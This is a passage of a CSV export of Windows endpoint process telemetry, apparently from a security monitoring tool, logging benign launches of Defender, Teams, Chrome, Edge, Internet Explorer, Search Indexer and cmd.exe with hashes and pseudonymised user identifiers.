07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1019,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 04:39:58.655872400+00:00,14900,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 7E61B0F3-4EC9-3869-B0B0-EB8828F68E25 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 04:39:59.483700800+00:00,2021-06-24 04:40:20.920324400+00:00,b4e646ce-bd4f-47f6-9a65-82841cc7550e,computerpii_0a470890c60768167990033d701e7bd881398861,175698,False,10.7740.19041.1052,False,11540474045145394,,11540474045176632,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+1020,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 10:11:46.754267100+00:00,21344,backgroundTaskHost.exe,"""BackgroundTaskHost.exe"" -ServerName:BackgroundTaskHost.WebAccountProvider",PortableExecutable,2020-10-09 20:47:01.870262+00:00,C:\Windows\System32\backgroundTaskHost.exe,19776,da7063b17dbb8bbb3015351016868006,20330d3ca71d58f4aeb432676cb6a3d5b97005954e45132fb083e90782efdd50,c6e63c7aae9c4e07e15c1717872c0c73f3d4fb09,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 10:11:46.878912700+00:00,2021-06-23 10:13:55.196524600+00:00,70df5311-5b75-4b89-9f58-cfdc05e08957,computerpii_0a470890c60768167990033d701e7bd881398861,166962,False,10.7740.19041.1052,False,11540474045136908,,11540474045174873,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,16512,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,Background Task Host,backgroundTaskHost.exe,Background Task Host
+1021,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 04:20:55.997675500+00:00,1912,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_MmI4MWFkYjktMDI1Ny00MzkxLWFmZGYtY2IyNzg5OTVmY2Zh%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22ca3be21a-a97f-4b69-ba2c-cd1749962d11%22%7d&launchAgent=outlook_protocol_launch""",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:20:56.122156900+00:00,2021-06-23 04:22:09.443777600+00:00,e2e522e1-8049-4c27-a078-f220de95b095,computerpii_0a470890c60768167990033d701e7bd881398861,162509,False,10.7740.19041.1052,False,11540474045171845,,11540474045173387,2021-06-23 00:51:43.564026600+00:00,16176,2021-06-23 00:51:43.564026600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16176,128,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-23 00:51:43.826220200+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1022,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 04:20:57.011503700+00:00,10512,Teams.exe,"""Teams.exe"" --type=gpu-process --field-trial-handle=1480,7007372372529067940,14353286034221334342,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --electron-shared-settings=eyJ********** --gpu-preferences=KAAAAAAAAADgAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=1728 --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 04:20:55.997675500+00:00,1912,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_MmI4MWFkYjktMDI1Ny00MzkxLWFmZGYtY2IyNzg5OTVmY2Zh%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22ca3be21a-a97f-4b69-ba2c-cd1749962d11%22%7d&launchAgent=outlook_protocol_launch""",False,2021-06-23 00:51:43.564026600+00:00,16176,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:20:57.076329500+00:00,2021-06-23 04:22:09.443875200+00:00,722eb299-ac0c-4f00-afb8-2e95450cf641,computerpii_0a470890c60768167990033d701e7bd881398861,162511,False,10.7740.19041.1052,False,11540474045173387,,11540474045173389,2021-06-23 04:20:55.997675500+00:00,1912,2021-06-23 04:20:55.997675500+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1912,16512,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1023,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 04:20:57.302250500+00:00,13896,Teams.exe,"""Teams.exe"" --type=gpu-process --field-trial-handle=1140,6588584928007167099,8831769960516841227,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --electron-shared-settings=eyJ********** --gpu-preferences=KAAAAAAAAADgAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=1124 --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 04:20:56.290625900+00:00,9984,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_MmI4MWFkYjktMDI1Ny00MzkxLWFmZGYtY2IyNzg5OTVmY2Zh%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22ca3be21a-a97f-4b69-ba2c-cd1749962d11%22%7d&launchAgent=outlook_protocol_launch""",False,2021-06-23 00:51:43.564026600+00:00,16176,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:20:57.351688600+00:00,2021-06-23 04:22:09.444025400+00:00,20a964f1-6d6e-45ef-a2f4-0207f48d848f,computerpii_0a470890c60768167990033d701e7bd881398861,162514,False,10.7740.19041.1052,False,11540474045173388,,11540474045173390,2021-06-23 04:20:56.290625900+00:00,9984,2021-06-23 04:20:56.290625900+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,9984,18560,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1024,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:32:58.242156+00:00,7420,iexplore.exe,"""IEXPLORE.EXE"" SCODEF:13508 CREDAT:9474 /prefetch:2",PortableExecutable,2019-12-07 09:51:10.439373900+00:00,C:\Program Files (x86)\Internet Explorer\iexplore.exe,816072,2e414291458b49acda42c80a4c10de7e,e582676ec900249b408ab4e37976ae8c443635a7da77755daf6f896a172856a3,6bd522a0f1b3f5c11e8e33c5062c45dd6e402113,6bfe7ca23c89fd5809a48355ec5625ee,f76f00939f1be76152809c37591ef75d3c150745232e35697d99cae09e31c2bc,9ed866e14bb54406c075929183524039ab851a25,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 01:32:58.054806300+00:00,13508,iexplore.exe,"""iexplore.exe"" -startmanager -Embedding",False,2021-06-10 00:46:10.653932100+00:00,504,\Device\HarddiskVolume3\Windows\System32\svchost.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:32:58.270506300+00:00,2021-06-25 01:33:25.147004600+00:00,ec74b2ff-97e4-4e94-88aa-cf33481619e6,computerpii_0a470890c60768167990033d701e7bd881398861,183485,False,10.7740.19041.1052,False,11540474045178770,,11540474045178771,2021-06-25 01:32:58.054806300+00:00,13508,2021-06-25 01:32:58.054806300+00:00,\Device\HarddiskVolume3\Program Files\Internet Explorer\iexplore.exe,13508,128,ActiveProcessStartkey,C:\Program Files\Internet Explorer,819136,2040-12-07 02:05:59+00:00,2019-12-06 21:47:00+00:00,2021-06-25 01:32:58.057684800+00:00,2019-12-07 09:51:10.439373900+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Internet Explorer,11.00.19041.1,iexplore,IEXPLORE.EXE,Internet Explorer,Microsoft Corporation,Internet Explorer,11.00.19041.1,iexplore,IEXPLORE.EXE,Internet Explorer
+1025,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:11:00.445265200+00:00,4180,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1468 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:11:00.684921600+00:00,2021-06-24 03:12:58.398462300+00:00,2a70afb1-dcdf-4451-a7c6-c9d63d3b386e,computerpii_0a470890c60768167990033d701e7bd881398861,173995,False,10.7740.19041.1052,False,11540474045175158,,11540474045176171,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+1026,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:26:17.626022100+00:00,11760,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9712 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:26:18.230258900+00:00,2021-06-24 03:27:25.516712+00:00,176f8d94-8913-430c-ac92-0b2dd4a490bd,computerpii_0a470890c60768167990033d701e7bd881398861,174435,False,10.7740.19041.1052,False,11540474045175164,,11540474045176276,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+1027,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:41:14.957262300+00:00,19992,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey D2B01101-0E17-2A2A-28E8-324F9E39E12F ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:41:15.195722100+00:00,2021-06-23 03:41:34.752360100+00:00,57b16e9c-21b4-48bb-9737-94b979c0c404,computerpii_0a470890c60768167990033d701e7bd881398861,162018,False,10.7740.19041.1052,False,11540474045145394,,11540474045173220,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,2176,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+1028,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:53:49.532981400+00:00,16656,cmd.exe,cmd.exe ,PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:31:13.489936600+00:00,12940,cmd.exe,cmd.exe ,True,2021-06-23 